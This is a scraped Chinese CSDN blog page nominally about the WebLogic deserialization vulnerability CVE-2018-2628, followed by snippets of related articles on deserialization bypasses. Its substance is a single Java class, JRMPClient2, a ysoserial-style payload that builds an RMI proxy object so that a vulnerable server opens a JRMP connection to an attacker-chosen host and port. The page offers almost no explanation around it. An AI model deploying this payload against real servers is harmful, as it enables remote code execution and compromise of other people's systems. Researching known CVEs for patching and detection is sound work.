java的反序列化操作 可以绕过对象_Weblogic 反序列化漏洞(CVE-2018-2628)漫谈

最新推荐文章于 2024-07-23 14:49:30 发布
最新推荐文章于 2024-07-23 14:49:30 发布
阅读量312 收藏
点赞数
文章标签: java的反序列化操作 可以绕过对象
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30419759/article/details/114860229
版权

[AppleScript] 纯文本查看 复制代码public class JRMPClient2 extends PayloadRunner implements ObjectPayload {

public Activator getObject ( final String command ) throws Exception {

String host;

int port;

int sep = command.indexOf(':');

if ( sep < 0 ) {

port = new Random().nextInt(65535);

host = command;

}

else {

host = command.substring(0, sep);

port = Integer.valueOf(command.substring(sep + 1));

}

ObjID id = new ObjID(new Random().nextInt()); // RMI registry

TCPEndpoint te = new TCPEndpoint(host, port);

UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));

RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);

Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] {

Activator.class

}, obj);

return proxy;

}

public static void main ( final String[] args ) throws Exception {

Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());

PayloadRunner.run(JRMPClient2.class, args);

}

}

宗申店Q组533
关注
Java反序列化(之)JNDI注入绕过高版本限制
Vicl1fe的博客
12-30 974
前言 JNDI注入绕过高版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
java反序列化操作 可以绕过对象_fastjson反序列化漏洞绕过方式有哪些?
weixin_35256987的博客
02-28 1635
序列化其实就是将对象转换为流,利于储存和传输的格式,反序列化就是跟序列化反过来,可以fastjson反序列化会有漏洞,大家要怎么去绕过这个漏洞呢?下面我们就给大家讲解一下。如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行漏洞防御:1、类的白名单校验机制:实际上原理很简单,就是对所...
【网络安全渗透测试零基础入门必知必会】之Java 反序列化漏洞(非常详细)零基础入门到精通,收藏这一篇就够了3
最新发布
Libra1313的博客
07-23 577
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段反序列化渗透与防御第3篇。本文主要讲解java反序列化漏洞反序列化漏洞是指程序在反序列化期间,通过特殊的调用链引发的一系列安全问题。编程语言中只要存在序列化,反序列化功能就可能存在反序列化的安全问题。这里只针对Java和PHP进行讨论。序列化的存在主要是为了存储和传输,将这些在程序内存中的对象转换成数据字节流。由对象转换得到字节流的过程就称作是序列化。反序列化就是由字节流转换得到对象的过程。
反序列化函数绕过
since_2020的博客
08-05 688
__wakeup()方法绕过 函数作用: 与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。 绕过方法: 当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。 <?php class Name{ private $username = 'admin'; private $password = 100; } $a = new Name(); $str = seria
java反序列化
yanyuan904的专栏
04-13 1484
  之前介绍过java内置的序列化,今天总结下java反序列化,主要介绍一点吧,它是怎么跳过构造函数生成对象的,当然跳过不是故意的,因为它本身实现就没依赖构造函数。比如我们定义了一个private的构造函数的bean,它序列化后的数据仍然可以反序列化出来。总之吧,反序列化不会触发构造函数的逻辑。   反序列化时调用链: objectInputStream.readObject()-&gt; ...
Java对象反序列化操作
实践求真知
07-21 425
一代码 import java.io.File; import java.io.FileInputStream; import java.io.InputStream; import java.io.ObjectInputStream; public class SerDemo02 { public static void main(String[] args) throws Ex...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
java反序列化 构造函数_在Java反序列化时是否调用对象中的构造函数
weixin_42322512的博客
02-16 2123
Java中,序列化是一个概念,通过它我们可以将对象的状态写入字节流,以便我们可以通过网络(使用JPA和RMI等技术)传输它。序列化对象-确保该类实现了Serializable接口。创建一个FileOutputStream对象,该对象表示要将对象存储到的文件的文件(抽象路径)。通过传递上面创建的FileOutputStream对象来创建ObjectOutputStream 对象。使用writeOb...
java能不能通过构造函数创建对象_跳过构造函数创建 Java 对象(测试)
weixin_40000999的博客
02-23 1252
如果一个 Java类在初始化时会有外部依赖,这就给单元测试创建它的实例时造成困难。当然被测试类可以改造为依赖全部构造时注入或创建实例后延迟注入,这里不考虑这种改造。来说下面的例子public class OrderService {private PriceInquiry priceInquiry = new PriceInquiry();.........public double total...
java对象的序列化与反序列化
qq_34117495的博客
09-19 313
IO——对象的序列化和反序列化 一、概念 1、对象序列化,就是将Object转换成byte序列,反之叫对象反序列化 2、序列化流(ObjectOutputStream),字节的过滤流 —— writeObject()方法 反序列化流(ObjectInputStream)—— readObject()方法 3、序列化接口(Serializable) 对象必须实现序列化接口,才能进行序列
c#.net实体类序列化方法
rise51的专栏
12-16 634
c#.net实体类序列化方法2010-1-7      来源:e800技术客 关键词: <br />IT江湖客IT江湖客的文章<br />云计算当红霸气展望 SaaS合作所向披靡<br />ERP选型博弈:销售立场与客户立场<br />个人页面<br />登陆交谈 <br />  提到为了传递数据,需要把作为载体的实体类序列化,好好的找了一些序列化方面的介绍。感觉下面的这个介绍比较容易介绍!<br />1.什么是序列化<br />序列化是将对象状态转换为可保持或传输的格式的过程,在序列化过程中,对象的公共字
JAVA序列化与反序列化
u013190513的博客
06-21 768
我们在创建对象时,只要你需要,对象会一直存在,但是当程序终止时,无论如何它都不会继续存在。但仍然存在某些情况,需要在程序结束后仍保存其信息,比如某个程序中有关用户偏好设置的对象,我们希望在程序结束时这些信息也继续存在,当重新启动程序时,可以直接直接获得该对象来进行初始化。如果在语言层面能将对象声明是“持久性”的,并自动为我们处理实现细节,那将是非常方便的。 Java对象序列化是将那些实现
java 序列化 构造函数_Java反序列化时是否通过默认构造函数创建对象
weixin_42522857的博客
02-16 366
问题背景今天在解决一个对象的持久化问题时,需要用到序列化技术。一开始,我想用 fastjson,但是麻烦的是这个框架是基于 getter 方法来序列化对象的,可是我序列化的对象不是一个标准的 Java Bean 对象,没有 getter/setter 方法。而我的需求是根据字段(类成员变量)来序列化对象。然后我就想到了使用 Java 序列化技术,并且配合使用 transient 屏蔽不需要参与序列...
java 反序列化 构造函数_java序列化反序列化深入探究
weixin_31495827的博客
02-24 394
When---什么时候需要序列化和反序列化:简单的写一个hello world程序,用不到序列化和反序列化。写一个排序算法也用不到序列化和反序列化。但是当你想要将一个对象进行持久化写入文件,或者你想将一个对象从一个网络地址通过网络协议发送到另一个网络地址时,这时候就需要考虑序列化和反序列化了。另外如果你想对一个对象实例进行深度拷贝,也可以通过序列化和反序列化的方式进行。What---什么是序列化和...
序列化与反序列化——作为Java开发,应该避开这些坑
程序员小明1024
02-11 231
文章目录 1.序列化与反序列化的概念 2.子类实现Serializable接口,父类没有实现,子类可以序列化吗? 3.类中存在引用对象,这个类对象在什么情况下可以实现序列化? 4.同一个对象多次序列化之间有属性更新,前后的序列化有什么区别? 1.序列化与反序列化的概念 先说说序列化和反序列化的概念 序列化:将对象写入到IO流中 反序列化:从IO流中恢复对象 Serializ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值